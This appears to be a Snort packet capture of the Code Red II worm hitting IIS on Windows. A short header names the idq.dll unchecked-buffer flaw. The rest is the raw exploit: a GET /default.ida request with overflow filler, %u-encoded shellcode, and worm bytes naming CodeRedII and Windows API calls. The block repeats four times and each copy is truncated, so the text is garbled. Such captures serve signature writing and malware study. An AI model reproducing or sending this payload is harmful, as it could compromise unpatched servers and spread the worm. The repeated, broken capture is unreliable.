IIS on Windows
Buffer overflow
Remote access
Captured with snort
An unchecked buffer in idq.dll allows execution of arbitrary code.
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ÈÈ`èÌëþdgÿ6dg&èßh \þÿÿPÿU \þÿÿPÿU@XþÿÿÿUä=Á=ŠͶÉTþÿÿu~0ÄÇF0è CodeRedII$ÿUØfÀ 8þÿÿÇ Pþÿÿj PþÿÿP 8þÿÿPEÿpÿ½8þÿÿthSÿUÔÿUìEi½Tþÿÿ,Ç,èÒ÷ЯÇF4EPjÿuèéÿÿÿjjÿUðPÿUÐOuÒè;i½Tþÿÿ\&Ç\&WÿUèjjÿUjÿÿUèëùF4)EjdÿUè <þÿÿPÿUÀ· <þÿÿ=ÒsÏ· >þÿÿø sÃfÇ pÿÿÿfÇ rÿÿÿPèdtÿÿÿjjjÿU¸øÿtòEjTh~fÿuÿU¤Yj pÿÿÿPÿuÿU°»ÀtK3ÛÿU=3'u?Ç hÿÿÿ Ç lÿÿÿÇ `ÿÿÿE dÿÿÿ hÿÿÿPj `ÿÿÿPjjÿU jTh~fÿuÿU¤Yûu1èX-ÓjhêPÿuÿU¬=êujj \þÿÿPÿuÿU¨ÿuÿU´éçþÿÿ»ßwÃûxu»ð¿`èd$dgXaëÙdgÿ6dg&f;MZuãK<<PEu×TxÓB<KERNuÅ|EL32u»3ÉIr óüA<GetPuõ|rocAuëJIÑáJ$·ÁáJÃD$$dgXaÃèQÿÿÿ]üEøè LoadLibraryAÿuüÿUøEôè CreateThreadÿuüÿUøEðè GetTickCountÿuüÿUøEìèSleepÿuüÿUøEèèGetSystemDefaultLangIDÿuüÿUøEäèGetSystemDirectoryAÿuüÿUøEàè CopyFileAÿuüÿUøEÜèGlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ÈÈ`èÌëþdgÿ6dg&èßh \þÿÿPÿU \þÿÿPÿU@XþÿÿÿUä=Á=ŠͶÉTþÿÿu~0ÄÇF0è CodeRedII$ÿUØfÀ 8þÿÿÇ Pþÿÿj PþÿÿP 8þÿÿPEÿpÿ½8þÿÿthSÿUÔÿUìEi½Tþÿÿ,Ç,èÒ÷ЯÇF4EPjÿuèéÿÿÿjjÿUðPÿUÐOuÒè;i½Tþÿÿ\&Ç\&WÿUèjjÿUjÿÿUèëùF4)EjdÿUè <þÿÿPÿUÀ· <þÿÿ=ÒsÏ· >þÿÿø sÃfÇ pÿÿÿfÇ rÿÿÿPèdtÿÿÿjjjÿU¸øÿtòEjTh~fÿuÿU¤Yj pÿÿÿPÿuÿU°»ÀtK3ÛÿU=3'u?Ç hÿÿÿ Ç lÿÿÿÇ `ÿÿÿE dÿÿÿ hÿÿÿPj `ÿÿÿPjjÿU jTh~fÿuÿU¤Yûu1èX-ÓjhêPÿuÿU¬=êujj \þÿÿPÿuÿU¨ÿuÿU´éçþÿÿ»ßwÃûxu»ð¿`èd$dgXaëÙdgÿ6dg&f;MZuãK<<PEu×TxÓB<KERNuÅ|EL32u»3ÉIr óüA<GetPuõ|rocAuëJIÑáJ$·ÁáJÃD$$dgXaÃèQÿÿÿ]üEøè LoadLibraryAÿuüÿUøEôè CreateThreadÿuüÿUøEðè GetTickCountÿuüÿUøEìèSleepÿuüÿUøEèèGetSystemDefaultLangIDÿuüÿUøEäèGetSystemDirectoryAÿuüÿUøEàè CopyFileAÿuüÿUøEÜèGlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ÈÈ`èÌëþdgÿ6dg&èßh \þÿÿPÿU \þÿÿPÿU@XþÿÿÿUä=Á=ŠͶÉTþÿÿu~0ÄÇF0è CodeRedII$ÿUØfÀ 8þÿÿÇ Pþÿÿj PþÿÿP 8þÿÿPEÿpÿ½8þÿÿthSÿUÔÿUìEi½Tþÿÿ,Ç,èÒ÷ЯÇF4EPjÿuèéÿÿÿjjÿUðPÿUÐOuÒè;i½Tþÿÿ\&Ç\&WÿUèjjÿUjÿÿUèëùF4)EjdÿUè <þÿÿPÿUÀ· <þÿÿ=ÒsÏ· >þÿÿø sÃfÇ pÿÿÿfÇ rÿÿÿPèdtÿÿÿjjjÿU¸øÿtòEjTh~fÿuÿU¤Yj pÿÿÿPÿuÿU°»ÀtK3ÛÿU=3'u?Ç hÿÿÿ Ç lÿÿÿÇ `ÿÿÿE dÿÿÿ hÿÿÿPj `ÿÿÿPjjÿU jTh~fÿuÿU¤Yûu1èX-ÓjhêPÿuÿU¬=êujj \þÿÿPÿuÿU¨ÿuÿU´éçþÿÿ»ßwÃûxu»ð¿`èd$dgXaëÙdgÿ6dg&f;MZuãK<<PEu×TxÓB<KERNuÅ|EL32u»3ÉIr óüA<GetPuõ|rocAuëJIÑáJ$·ÁáJÃD$$dgXaÃèQÿÿÿ]üEøè LoadLibraryAÿuüÿUøEôè CreateThreadÿuüÿUøEðè GetTickCountÿuüÿUøEìèSleepÿuüÿUøEèèGetSystemDefaultLangIDÿuüÿUøEäèGetSystemDirectoryAÿuüÿUøEàè CopyFileAÿuüÿUøEÜèGlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ÈÈ`èÌëþdgÿ6dg&èßh \þÿÿPÿU \þÿÿPÿU@XþÿÿÿUä=Á=ŠͶÉTþÿÿu~0ÄÇF0è CodeRedII$ÿUØfÀ 8þÿÿÇ Pþÿÿj PþÿÿP 8þÿÿPEÿpÿ½8þÿÿthSÿUÔÿUìEi½Tþÿÿ,Ç,èÒ÷ЯÇF4EPjÿuèéÿÿÿjjÿUðPÿUÐOuÒè;i½Tþÿÿ\&Ç\&WÿUèjjÿUjÿÿUèëùF4)EjdÿUè <þÿÿPÿUÀ· <þÿÿ=ÒsÏ· >þÿÿø sÃfÇ pÿÿÿfÇ rÿÿÿPèdtÿÿÿjjjÿU¸øÿtòEjTh~fÿuÿU¤Yj pÿÿÿPÿuÿU°»ÀtK3ÛÿU=3'u?Ç hÿÿÿ Ç lÿÿÿÇ `ÿÿÿE dÿÿÿ hÿÿÿPj `ÿÿÿPjjÿU jTh~fÿuÿU¤Yûu1èX-ÓjhêPÿuÿU¬=êujj \þÿÿPÿuÿU¨ÿuÿU´éçþÿÿ»ßwÃûxu»ð¿`èd$dgXaëÙdgÿ6dg&f;MZuãK<<PEu×TxÓB<KERNuÅ|EL32u»3ÉIr óüA<GetPuõ|rocAuëJIÑáJ$·ÁáJÃD$$dgXaÃèQÿÿÿ]üEøè LoadLibraryAÿuüÿUøEôè CreateThreadÿuüÿUøEðè GetTickCountÿuüÿUøEìèSleepÿuüÿUøEèèGetSystemDefaultLangIDÿuüÿUøEäèGetSystemDirectoryAÿuüÿUøEàè CopyFileAÿuüÿUøEÜèGlob